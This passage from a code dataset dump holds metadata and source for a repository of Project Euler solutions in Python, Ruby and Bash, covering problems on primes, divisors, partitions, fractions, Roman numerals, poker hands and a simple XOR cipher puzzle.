"max_line_length": 56, "num_lines": 22, "path": "/21/amicable_pairs.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport math\n\ndef sum_of_divisors(x):\n\tlimit = int(math.ceil(math.sqrt(x))) + 1\n\tdivisors = []\n\tfor d in filter(lambda i: x % i == 0, range(1, limit)):\n\t\tdivisors.append(d)\n\t\tdividend = x / d\n\t\tif (dividend != d and dividend != x):\n\t\t\tdivisors.append(dividend)\n\t\n\treturn reduce(lambda x, y: x + y, divisors)\n\namicable_numbers = set([])\nfor a in range(4, 10000):\n\tb = sum_of_divisors(a)\n\tif (sum_of_divisors(b) == a and a != b):\n\t\tamicable_numbers.add(a)\n\t\tamicable_numbers.add(b)\t\n\t\nprint(reduce(lambda x, y: x + y, amicable_numbers))\n\t\t \n" }, { "alpha_fraction": 0.5768262147903442, "alphanum_fraction": 0.6322417855262756, "avg_line_length": 14.269230842590332, "blob_id": "746b209f11ecc6e8f311a71e581eede3555bdb90", "content_id": "438a7d869d4ddd575f04d844291905bade23610c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 397, "license_type": "no_license", "max_line_length": 38, "num_lines": 26, "path": "/73/proper_fractions_set.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nfrom fractions import Fraction\n\nlower = Fraction(1, 3)\nupper = Fraction(1, 2)\nnum_start = 4001\nden = 12000\ncount = 0\n\nwhile den > 1:\n\tnum = num_start\n\twhile Fraction(num - 1, den) > lower:\n\t\tnum -= 1\t\n\n\tnum_start = num\n\tfrac = Fraction(num, 
den)\n\twhile frac < upper:\n\t\tif frac.denominator == den:\n\t\t\tcount += 1\n\t\tnum += 1\n\t\tfrac = Fraction(num, den)\n\n\tden -= 1\n\nprint(count)\n" }, { "alpha_fraction": 0.5610765814781189, "alphanum_fraction": 0.5859213471412659, "avg_line_length": 20.954545974731445, "blob_id": "72c1fa66086a739aabb42e64260c51ce36f544d1", "content_id": "6b7b84ea0c09ce7df70e229c88c996e5e0e08873", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 483, "license_type": "no_license", "max_line_length": 80, "num_lines": 22, "path": "/76/hundred_sum.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n# See http://en.wikipedia.org/wiki/Partition_function_(number_theory)\n\ncache = {}\ndef i(k, n):\n\t'''Number of partitions n, only using natural numbers at least as large as k'''\n\tif k > n:\n\t\treturn 0\n\telif k == n:\n\t\treturn 1\n\telse:\n\t\tif (k, n) in cache:\n\t\t\treturn cache[(k, n)]\n\t\telse:\n\t\t\tcached = i(k + 1, n) + i(k, n - k)\n\t\t\tcache[(k, n)] = cached\n\t\t\treturn cached\n\ndef p(n):\n return reduce(lambda x, y: x + i(y, n - y), xrange(1, (n/2) + 1), 0)\n\nprint(p(100))\n" }, { "alpha_fraction": 0.6193181872367859, "alphanum_fraction": 0.6439393758773804, "avg_line_length": 18.518518447875977, "blob_id": "c93116dfaff48986a38e6a4103751150dd3299a7", "content_id": "6e32d4c35267fc63e9801dfe7a2aece063bd3dcf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 528, "license_type": "no_license", "max_line_length": 73, "num_lines": 27, "path": "/87/prime_powers.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire File.dirname(File.expand_path(__FILE__)) + '/../util/ruby/primes'\nrequire 'set'\n\nLIMIT = 50_000_000\nPRIMES = Primes::sieve((LIMIT ** (0.5)).to_i)\n\ndef prime_power(power)\n\tPRIMES.map { |x| x ** power }.select { |x| x < LIMIT }\nend\n\nprime_squares = prime_power(2)\nprime_cubes = prime_power(3)\nprime_fourth = prime_power(4)\nnumbers = Set.new\n\nprime_squares.each do |s| \n\tprime_cubes.each do |c|\n\t\tprime_fourth.each do |f|\n\t\t\tsum = s + c + f\n\t\t\tnumbers << sum if sum < LIMIT\n\t\tend\n\tend\nend\n\np numbers.size\n\n" }, { "alpha_fraction": 0.5046296119689941, "alphanum_fraction": 0.5370370149612427, "avg_line_length": 17, "blob_id": "557b57c68748ea8cca85fe4bee07cfb7aee3fcf8", "content_id": "df1ebe04e41f3139a39b2a3d4b9f2958d4b6ba90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 216, "license_type": "no_license", "max_line_length": 50, "num_lines": 12, "path": "/util/ruby/primes.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "module Primes\n\tdef self.sieve(x)\n\t\tprimes = (0..x).to_a\n\t\tlimit = (x ** (0.5)).to_i\n\t\n\t\t(2..limit).each do |s|\n\t\t\t(2 * s).step(x, s).each { |t| primes[t] = nil }\n\t\tend\n\t\tprimes[0..1] = nil\n\t\tprimes.compact!\n\tend\nend\n" }, { "alpha_fraction": 0.5462962985038757, "alphanum_fraction": 0.5879629850387573, "avg_line_length": 12.5, "blob_id": "8874486bd8222316d13564a2e04288bb6dee2590", "content_id": "c40ff87d3982aae9e54312b99067a41613e5eacd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 216, "license_type": "no_license", "max_line_length": 63, "num_lines": 16, "path": "/12/triangle_divisors.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ntriangle = 1\ni\t= 
2\n\nloop {\n\ttriangle += i\n\ti += 1\n\n\tlimit = Math.sqrt(triangle).to_i\n\tfactors =\t(1..limit).select { |x| triangle % x == 0 }.size * 2\n\tif factors > 500 \n\t\tputs triangle\n\t\tbreak\n\tend\n}\n" }, { "alpha_fraction": 0.375, "alphanum_fraction": 0.6458333134651184, "avg_line_length": 23, "blob_id": "94c2cd2de48cc3a23f7fb5d2d9c6dd329231a7b4", "content_id": "ee943990cfb7e474688592063c91802f2dc38d78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 48, "license_type": "no_license", "max_line_length": 35, "num_lines": 2, "path": "/3/factor.sh", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/bin/bash\nfactor 600851475143 | cut -d' ' -f5\n" }, { "alpha_fraction": 0.49444442987442017, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 17, "blob_id": "bc919cfd65f7478ef79fbc536b2703384421bb5d", "content_id": "5b821f106a493db9e3692d5bf91ff2a7196ce630", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 180, "license_type": "no_license", "max_line_length": 69, "num_lines": 10, "path": "/40/irrational.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\ns = \"\"\nfor i in range(1, 1000000):\n\ts += str(i)\n\ndef nth_digit(n):\n\treturn int(s[n-1])\n\nprint(reduce(lambda x, y: x * nth_digit(pow(10, y)), range(0, 6), 1))\n" }, { "alpha_fraction": 0.6247464418411255, "alphanum_fraction": 0.6490872502326965, "avg_line_length": 24.947368621826172, "blob_id": "c6057c0467791051cb70edce141cb47cabb1c3cf", "content_id": "15c1f9ea41b4c0807443907a8b49232e66f1fcde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 493, "license_type": "no_license", "max_line_length": 73, "num_lines": 19, "path": "/37/truncatable_primes.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire File.dirname(File.expand_path(__FILE__)) + '/../util/ruby/primes'\nrequire 'set'\n\nPRIMES = Primes::sieve(800000)\nNON_TRUNCATABLE = [2, 3, 5, 7]\n\ndef is_truncatable_prime?(p)\n\treturn false if NON_TRUNCATABLE.include? p\n\tstr = p.to_s\n\tlimit = str.size\n\ttruncs = (0..limit).map do |x| \n\t[str[0..limit - x], str[x..limit]]\n\tend.flatten.uniq.reject { |x| x.empty? }\n\ttruncs.all? {|x| PRIMES.include? 
x.to_i }\nend\n\np PRIMES.select { |x| is_truncatable_prime?(x) }.reduce(:+)\n" }, { "alpha_fraction": 0.5830115675926208, "alphanum_fraction": 0.6293436288833618, "avg_line_length": 20.58333396911621, "blob_id": "fd5f8abe327937e6fa1c8b88d30898bcac3c8d18", "content_id": "1da3313ffcffdf8526c488ec6d66e45c77c54716", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 259, "license_type": "no_license", "max_line_length": 81, "num_lines": 12, "path": "/30/narcissistic.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport math\n\nnumbers = []\nexponent = 5\n\nfor i in xrange(2, 1000000):\n\tsum_of_pow = reduce(lambda x, y: int(x) + math.pow(int(y), exponent), str(i), 0)\n\tif (sum_of_pow == i):\n\t\tnumbers.append(i)\n\nprint(reduce(lambda x, y: x + y, numbers))\n" }, { "alpha_fraction": 0.6145339608192444, "alphanum_fraction": 0.620853066444397, "avg_line_length": 22.44444465637207, "blob_id": "6195587b0f8bdbb8ab0425430e6b25ea58087d12", "content_id": "fea62a57fb667462d16347db7f35c5a6e6ccf40b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 633, "license_type": "no_license", "max_line_length": 84, "num_lines": 27, "path": "/89/roman.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\nSUB_ARR = [\n [\"DCCCC\", \"MC\"],\n [\"CCCC\", \"CD\"],\n [\"LXXXX\", \"XC\"],\n [\"XXXX\", \"XL\"],\n [\"VIIII\", \"IX\"],\n [\"IIII\", \"IV\"],\n]\n\ndef refine_roman(roman)\n refined_roman = roman\n SUB_ARR.each do |x|\n refined_roman = refined_roman.gsub(x[0], x[1]) if (refined_roman.include?(x[0]))\n end\n refined_roman \nend\n\ndef total_length(arr_of_strings)\n arr_of_strings.inject(0) { |sum, x| sum + x.length }\nend\n\nnumerals = IO.readlines('roman.txt').map { |x| x.chomp }\ninitial_len = total_length(numerals)\nreduced_nums = numerals.map { |x| refine_roman(x) }\nreduced_len = total_length(reduced_nums)\np initial_len - reduced_len\n" }, { "alpha_fraction": 0.446153849363327, "alphanum_fraction": 0.5653846263885498, "avg_line_length": 19, "blob_id": "9017fc0699f02b7910667b4ecf6cb74874e3054a", "content_id": "a2084eacc066890c508ed660c4c29775f9cb1cfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/31/currency.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n# See http://www.blindrut.ca/~neitsch/math/talks/m496pres1.nb.pdf\na = [1, 2, 5, 10, 20, 50, 100, 200]\n\ndef fn(n, k):\n\tif k < 0 or n < 0:\n\t\treturn 0\n\telif n == 0:\n\t\treturn 1\n\telse:\n\t\treturn fn(n, k - 1) + fn(n - a[k], k)\n\nprint(fn(200, 7))\n" }, { "alpha_fraction": 0.5917525887489319, "alphanum_fraction": 0.6268041133880615, "avg_line_length": 15.166666984558105, "blob_id": "4b2ba5d7bcd8fbb41cf6afc0e87cb84151651fb7", "content_id": "614a71d60bf64ee2bf8c51bfe8cdc59cc6ac5f2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 485, "license_type": "no_license", "max_line_length": 45, "num_lines": 30, "path": "/74/factorial_chains.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nfrom math import factorial\n\nfac = {}\nfor i in xrange(0, 10):\n\tfac[i] = factorial(i)\n\ndef sum_factorial_digits(x):\n\treturn sum([fac[int(i)] for i in str(x)])\n\nknown = {}\ndef chain(x, terms):\n\tif (x 
in known):\n\t\treturn len(terms) + known[x]\n\n\tif (x in terms):\n\t\treturn len(terms)\n\t\n\tterms.append(x)\n\treturn chain(sum_factorial_digits(x), terms)\n\ncount = 0\nfor i in xrange(1, 1000000):\n\tres = chain(i, [])\n\tknown[i] = res\n\tif (res == 60):\n\t\tcount += 1\n\nprint(count)\n" }, { "alpha_fraction": 0.6071428656578064, "alphanum_fraction": 0.6461039185523987, "avg_line_length": 21, "blob_id": "b26df7773bde64207b8dd092d34a9f19d036830d", "content_id": "85bedf8d625677f990bacc3e38afc0bf72729a9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 308, "license_type": "no_license", "max_line_length": 80, "num_lines": 14, "path": "/69/relatively_prime.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/../util/python/\")\nfrom totient import *\n\nmax_result = 0\nmax_n = 2\nfor n in xrange(2, 1000000):\n\tn_on_phin = float(n) / totient(n)\n\tif n_on_phin > max_result:\n\t\tmax_result = n_on_phin\n\t\tmax_n = n\n\nprint(max_n)\n" }, { "alpha_fraction": 0.6101694703102112, "alphanum_fraction": 0.6483050584793091, "avg_line_length": 25.22222137451172, "blob_id": "48e9d1db6860608c6def27f3b4c431ef956ba7e4", "content_id": "6257c3df30b9e67c2ecbf01b9e483b18dd76ddbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 236, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/54/poker.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\nrequire 'ruby-poker'\n\nhands = IO.readlines(File.new(\"poker.txt\")).map do |line|\n\tstripped = line.strip\n\t[stripped[0..13], stripped[15..30]].map { |hand| PokerHand.new(hand) }\nend\n\np hands.select { |x| x[0] > x[1] }.size\n" }, { "alpha_fraction": 0.5577617287635803, "alphanum_fraction": 0.5866426229476929, "avg_line_length": 29.77777862548828, "blob_id": "0dd070bfcba6297e2e318a98b670dde0aa3eac8c", "content_id": "d7fa773c7c460a4814849b2f5bbe6f66b98db1ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 554, "license_type": "no_license", "max_line_length": 83, "num_lines": 18, "path": "/49/sequential_primes.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby \n\nrequire File.dirname(File.expand_path(__FILE__)) + '/../util/ruby/primes'\nrequire 'set'\n\nPRIMES = Primes::sieve(10000).select { |x| x > 1000 }\ngrouped = PRIMES.group_by { |x| x.to_s.chars.sort }.values.reject {|v| v.size < 3 }\n\nvals = grouped.map do |g|\n\tdiffs_map = g.combination(2).to_a.map do |x| \n\t\tHash[(x[0] - x[1]).abs, x] \n\tend.reduce({}) do |h, x| \n\t\th.merge(x) { |k, old, new| (old + new).sort.uniq }\n\tend\n\tdiffs_map.values.select { |x| x.size == 3 }\nend.reject { |x| x.empty? 
}\n\np vals[1][0].map { |x| x.to_s }.join(\"\").to_i\n" }, { "alpha_fraction": 0.6420187950134277, "alphanum_fraction": 0.6678403615951538, "avg_line_length": 21.421052932739258, "blob_id": "a12eb3c87cf830f2421b994ed2246b9c9b404daf", "content_id": "f8448bce3a72d85a2daf6214a655380a22220dc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 852, "license_type": "no_license", "max_line_length": 80, "num_lines": 38, "path": "/50/consecutive_primes.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nfrom math import ceil, sqrt\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/../util/python/\")\nfrom totient import primesbelow\n\nnum_primes = 1000000\nprimes = primesbelow(num_primes)\nprimes_len = len(primes)\nprime_set = set(primes)\n\nmax_count = 0\nmax_sum = 2\nsums = [primes[0]]\n\nfor i in xrange(1, primes_len):\n\tsums.append(sums[i - 1] + primes[i])\n\ndef max_vals(i, correction_factor):\n\tfor j in reversed(xrange(i+1, primes_len)):\n\t\tcount = j - i\n\t\tprime_sum = sums[j] - correction_factor\t\n\t\tif prime_sum in prime_set: \n\t\t\treturn [count, prime_sum]\n\treturn None\n\nfor i in xrange(0, primes_len):\n\tcorrection_factor = 0\n\tif i != 0:\n\t\tcorrection_factor = sums[i - 1] \n\n\tvals = max_vals(i, correction_factor)\t\n\tif vals:\n\t\tif vals[0] > max_count:\n\t\t\tmax_count = vals[0]\t\n\t\t\tmax_sum = vals[1]\n\nprint(max_sum)\n" }, { "alpha_fraction": 0.4976958632469177, "alphanum_fraction": 0.5622119903564453, "avg_line_length": 13.466666221618652, "blob_id": "28546a3afa30aa5a8ba25eef382d2c8d7c6a420f", "content_id": "48685d4145f803e691f56667e42b86d2d85bd203", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 51, "num_lines": 15, "path": "/7/prime.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport math\n\ndef is_prime(x):\n\tlim = int(math.ceil(math.sqrt(x)))\n\treturn all(x % i != 0 for i in xrange(2, lim + 1))\n\nn = 1\nx = 3 \nwhile (n < 10001):\n\tif is_prime(x):\n\t\tprint x\n\t\tn += 1\n\tx += 1\n" }, { "alpha_fraction": 0.5438066720962524, "alphanum_fraction": 0.5619335174560547, "avg_line_length": 24.461538314819336, "blob_id": "bc3e6915eeead80b85e54b22ac8ea67d7b3767c1", "content_id": "abae86e6aa11622491584778fba3394fc2ae5ac8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 993, "license_type": "no_license", "max_line_length": 159, "num_lines": 39, "path": "/51/same_digit_primes.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nrequire File.dirname(File.expand_path(__FILE__)) + '/../util/ruby/primes'\n\ndef bit_locations(selector, on = true)\n\tlocs = []\n\tpos = 0\n\tselector.each do |d|\n\t\tif (on && d == '1')\n\t\t\tlocs << pos\n\t\telsif (!on && d == '0')\n\t\t\tlocs << pos\n\t\tend\n\t\tpos += 1\n\tend\n\tlocs\nend\n\ndef ons_equal?(p, selector)\n\tlocs = bit_locations(selector)\n\tmap = locs.map { |x| p[x] } \n\tmap.all? 
{ |x| x == p[locs[0]] }\nend\n\ndef off_values(p, selector)\n\tbit_locations(selector, false).map { |x| p[x] }\nend\n\t\t\nlimit = 1000000\nprimes = Primes::sieve(limit).map { |x| x.to_s.chars.to_a }.group_by { |x| x.size }\n\nprimes.each do |size, subset|\n\tseries = (1..(2**size - 1)).map do |n| \n\t\tselector = (\"%0#{size}b\" % n).chars\n\t\tsubset.select { |p| ons_equal?(p, selector) }.group_by { |p| off_values(p, selector) }.select {|k, v| v.size == 8 }.values.flatten(1).map { |v| v.join.to_i }\n\tend.reject { |s| s.empty? }.flatten\n\t\n\tp series.first if (!series.empty?)\nend\n" }, { "alpha_fraction": 0.6269165277481079, "alphanum_fraction": 0.6643952131271362, "avg_line_length": 24.521739959716797, "blob_id": "e602772f6a4ec44e51a5cfd28de4432749690955", "content_id": "85ea7100b5ce21164c3a998c38e62aa92df98d0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 587, "license_type": "no_license", "max_line_length": 75, "num_lines": 23, "path": "/45/shaped_numbers.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport math\n\nlimit = 100000\ntriangle_numbers = []\n\ndef has_positive_integral_roots(a, b, c):\n\tsqrt_discriminant = math.sqrt(b*b - 4 * a * c)\n\tdivisor = 2*a\n\troots = [(-b + sqrt_discriminant), (-b - sqrt_discriminant)] \n\treturn any(i > 0 and i % divisor == 0 for i in roots)\n\ndef is_pentagonal(p):\n\treturn has_positive_integral_roots(3, -1, -2 * p)\n\ndef is_hexagonal(h):\n\treturn has_positive_integral_roots(2, -1, -h)\n\nfor n in range(286, limit):\n\ttriangle_numbers.append((n * (n + 1))/2)\n\nprint [x for x in triangle_numbers if is_pentagonal(x) and is_hexagonal(x)]\n" }, { "alpha_fraction": 0.5968436002731323, "alphanum_fraction": 0.615494966506958, "avg_line_length": 21.483871459960938, "blob_id": "0dbfeda61dbcee1ec883b9e78a0769b35be50d92", "content_id": "dfca157ae9960fe292390e609f327e87d39f39ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 697, "license_type": "no_license", "max_line_length": 72, "num_lines": 31, "path": "/59/cipher.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ndef xor_arrays(arr1, arr2)\n\tarr1.zip(arr2).map { |x| (x[0] ^ x[1]).chr }\nend\n\ndef xor_encrypt(str, key)\n\tstr.each_slice(key.size).map do |slice| \n\t\txor_arrays(slice, key.bytes)\n\tend.flatten.join\nend\n\ndef bins(arr, n)\n\t(0..n-1).map do |bin|\n\t\tbin.step(arr.size, n).map { |x| arr[x] }\t\n\tend\nend\n\ndef highest_freq(arr)\n\tfreq = arr.inject(Hash.new(0)) { |h,v| h[v] += 1; h}\n\tarr.sort_by { |v| freq[v] }.last\nend\n\nf = File.new(\"cipher1.txt\")\nchars = f.readlines[0].strip.split(\",\").map {|x| x.to_i }\nspace = \" \".ord\nkey = bins(chars, 3).map { |x| (highest_freq(x).to_i ^ space).chr }.join\n\ndecrypted = xor_encrypt(chars, key)\np decrypted\np decrypted.bytes.map { |x| x.ord }.reduce(:+)\n" }, { "alpha_fraction": 0.6100323796272278, "alphanum_fraction": 0.6343042254447937, "avg_line_length": 19.600000381469727, "blob_id": "54bca6a7ef7d01d66019e7a65467dc5036843400", "content_id": "1872cffeac3fb3a453a06f715e7eaedfbad7aace", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 618, "license_type": "no_license", "max_line_length": 72, "num_lines": 30, "path": "/23/abundant.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\nrequire 'set'\n\ndef divisors(x)\n\tlimit = Math.sqrt(x).ceil 
+ 1\n\tinitial_divisors = (1..limit).select { |d| x % d == 0 }\n\tdivisors = Set.new(initial_divisors)\n\tinitial_divisors.each do |d| \n \tdividend = x / d\n if (dividend != d and dividend != x)\n \tdivisors << dividend\n\t\tend\n\tend\n\n\tdivisors\nend\n\ndef abundant?(x)\n\tdivisors(x).reduce(:+) > x\nend\n\nabundant_set = (4..20161).select { |x| abundant?(x)}\nsum_of_two_abundants = Set.new\nabundant_set.each do |x|\n\tabundant_set.each do |y|\n\t\tsum_of_two_abundants << x + y\n\tend\nend\n\np (1..20161).select { |x| !sum_of_two_abundants.include?(x) }.reduce(:+)\n" }, { "alpha_fraction": 0.5854014754295349, "alphanum_fraction": 0.6014598608016968, "avg_line_length": 21.09677505493164, "blob_id": "f7d20517ff00c970e4d8d2e0d6e3daf7bb98e55d", "content_id": "fff83f90c2821dd4c85f210aab7cda76f5676147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 685, "license_type": "no_license", "max_line_length": 59, "num_lines": 31, "path": "/33/unorthodox_fractions.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nfrom fractions import Fraction\n\ndef replace_single(str_n, r):\n\trepl = str_n.replace(r, \"\")\n\tif not repl:\n\t\trepl = r \n\treturn repl\n\nunorthodox_f = []\nfor d in xrange(12, 100):\n\tif \"0\" in str(d):\n\t\tcontinue\n\t\n\tfor n in xrange(11, d):\n\t\tif \"0\" in str(n) or all(k not in str(d) for k in str(n)):\n\t\t\tcontinue\n\n\t\tf = Fraction(n, d)\n\t\tfor k in str(n):\n\t\t\tstr_d = str(d)\n\t\t\trepl_d = replace_single(str_d, k)\n\t\t\trepl_n = replace_single(str(n), k)\n\n\t\t\tif repl_d != str_d:\n\t\t\t\treduced_f_str = \"%s/%s\" % (repl_n, repl_d)\n\t\t\t\treduced_f = Fraction(reduced_f_str)\t\n\t\t\t\tif (reduced_f == f):\n\t\t\t\t\tunorthodox_f.append(f)\n\nprint(reduce(lambda x, y: x * y, unorthodox_f).denominator)\n" }, { "alpha_fraction": 0.5367231369018555, "alphanum_fraction": 0.598870038986206, "avg_line_length": 11.642857551574707, "blob_id": "9148022f9de000156e6df55ad87b36f5ccb03e3e", "content_id": "4bacfb4c7db61b8a4f8605426214ddcbb26ab9f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 177, "license_type": "no_license", "max_line_length": 24, "num_lines": 14, "path": "/28/spiral.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\ndiagonal_sum = 1\nlast = 1\n\n(3..1001).step(2) do |x|\n\tdelta = x - 1\n\t(1..4).each do |corner|\n\t\tlast += delta\n\t\tdiagonal_sum += last\n\tend\nend\t\n\nputs diagonal_sum\n" }, { "alpha_fraction": 0.5985401272773743, "alphanum_fraction": 0.6496350169181824, "avg_line_length": 20.076923370361328, "blob_id": "1c39d93dd1ef67264a44d47b3621dd59ecec8bdf", "content_id": "6b3f8d2298bcda83bb04508e0556f99be0cfdc84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 274, "license_type": "no_license", "max_line_length": 80, "num_lines": 13, "path": "/72/proper_fractions_set.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\n\nimport os, sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)) + \"/../util/python/\")\nfrom totient import *\n\ndef farey_terms(n):\n\tcount = 0\n\tfor i in xrange(1, n + 1):\n\t\tcount += totient(i)\n\treturn count + 1 \n\nprint(farey_terms(1000000) - 2)\n" }, { "alpha_fraction": 0.49400922656059265, "alphanum_fraction": 0.5400921702384949, "avg_line_length": 32.90625, "blob_id": "16547d1248e2b127ee3763a66a8b11349a442e73", 
"content_id": "bd65d772067bacdb4383438b988a4bf8175e84f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1085, "license_type": "no_license", "max_line_length": 168, "num_lines": 32, "path": "/17/letters_and_numbers.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nUNITS = {thousands: 1000, hundreds: 100, tens: 10, ones: 1}\nWORDS = {0 => \"\", 1 => \"one\", 2 => \"two\", 3 => \"three\", 4 => \"four\", 5 => \"five\", 6 => \"six\", 7 => \"seven\", 8 => \"eight\", 9 => \"nine\"}\nTEENS = {0 => \"ten\", 1 => \"eleven\", 2 => \"twelve\", 3 => \"thirteen\", 4 => \"fourteen\", 5 => \"fifteen\", 6 => \"sixteen\", 7 => \"seventeen\", 8 => \"eighteen\", 9 => \"nineteen\"}\nTENS = {0 => \"\", 2 => \"twenty\", 3 => \"thirty\", 4 => \"forty\", 5 => \"fifty\", 6 => \"sixty\", 7 => \"seventy\", 8 => \"eighty\", 9 => \"ninety\"}\n\n\ndef to_letters(x)\n\tbase = {}\n\tUNITS.each do |unit, val|\n\t\tbase[unit] = x / val\n\t\tx -= val * base[unit]\n\tend\n\t\n\tletters = \"\"\n\tletters << WORDS[base[:thousands]] + \"thousand\" unless base[:thousands] == 0\n\tletters << WORDS[base[:hundreds]] + \"hundred\" unless base[:hundreds] == 0\n\tletters << \"and\" if base[:hundreds] != 0 && (base[:tens] != 0 || base[:ones] != 0)\n\t\n\tcase base[:tens]\n\t\twhen 1\n\t\t\tletters << TEENS[base[:ones]]\n\t\telse\n\t\t\tletters << TENS[base[:tens]]\n\t\t\tletters << WORDS[base[:ones]] \n\tend\n\n\tletters\nend\n\nputs (1..1000).map {|x| to_letters(x)}.join.length\n" }, { "alpha_fraction": 0.5254777073860168, "alphanum_fraction": 0.5605095624923706, "avg_line_length": 12.65217399597168, "blob_id": "843a26d017d51edc5fc2ffde5503d17b21a50c9f", "content_id": "83aa366940058e906a0512aef1472b2dc2c93cc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 314, "license_type": "no_license", "max_line_length": 36, "num_lines": 23, "path": "/38/pandigital_prod.rb", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\nDIGITS = (1..9).map(&:to_s)\ndef pandigital(x)\n\tdigits = x.map(&:to_s).join\n\tif digits.split(//).sort! 
== DIGITS\n\t\tdigits.to_i\n\telse\n\t\tnil\n\tend\nend\n\nmax = 0\n(1..10000).each do |x|\n\tprods = [x]\t\n\t(2..9).each do |n|\n\t\tprods << n * x\t\n\t\tp = pandigital(prods)\n\t\tmax = p if p && p > max\n\tend\nend\n\np max\n" }, { "alpha_fraction": 0.46979865431785583, "alphanum_fraction": 0.5503355860710144, "avg_line_length": 36.25, "blob_id": "f821f65d9430522bcfde01d7a14bd7e82afbab60", "content_id": "be3b32f75cdeacdfdd46252be960c95278caa740", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 73, "num_lines": 4, "path": "/63/n_digit_nth_powers.py", "repo_name": "racc/euler", "src_encoding": "UTF-8", "text": "#!/usr/bin/python2.7\nimport math\na = [10 - math.ceil((10 ** (n - 1)) ** (1.0 / n)) for n in xrange(1, 23)]\nprint(int(reduce(lambda x, y: x + y, a)))\n" }, { "alpha_fraction": 0.6033755540847778, "alphanum_fraction": 0.649789035320282, "avg_line_length": 17.230770111083984, "blob_id": "05b1fced7e5d77b86565e67246d41240f125f078", "content_id": "6f388f04a87d43429556f86a8c5cdee2dd110618", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 237, "license_type": "no_license", "max_line_length": 76, "num_lines": 13, "path": 